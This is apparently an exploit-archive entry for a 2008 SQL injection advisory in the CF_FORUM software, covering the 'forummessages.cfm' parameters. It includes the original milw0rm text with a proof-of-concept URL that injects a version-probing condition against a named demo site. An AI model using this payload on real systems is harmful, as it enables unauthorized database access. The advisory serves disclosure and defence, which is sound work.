header-logo
Suggest Exploit
vendor:
CF_FORUM
by:
AlpHaNiX
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: CF_FORUM
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

CF_FORUM

A SQL injection vulnerability exists in CF_FORUM, which allows an attacker to execute arbitrary SQL commands via the 'topicnbr' and 'categorynbr' parameters in the 'forummessages.cfm' script.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : CF_FORUM
#download : null
#Demo     : http://www.cfmsource.com/forums/htdocs/


###########################################################################

#Exploits :

--=[SQL INJECTION]=--
http://www.cfmsource.com/forums/htdocs/forummessages.cfm?topicnbr=2&categorynbr=2%20and%20substring(@@version,1,1)=5

#Greetz For

###########################################################################

# milw0rm.com [2008-12-10]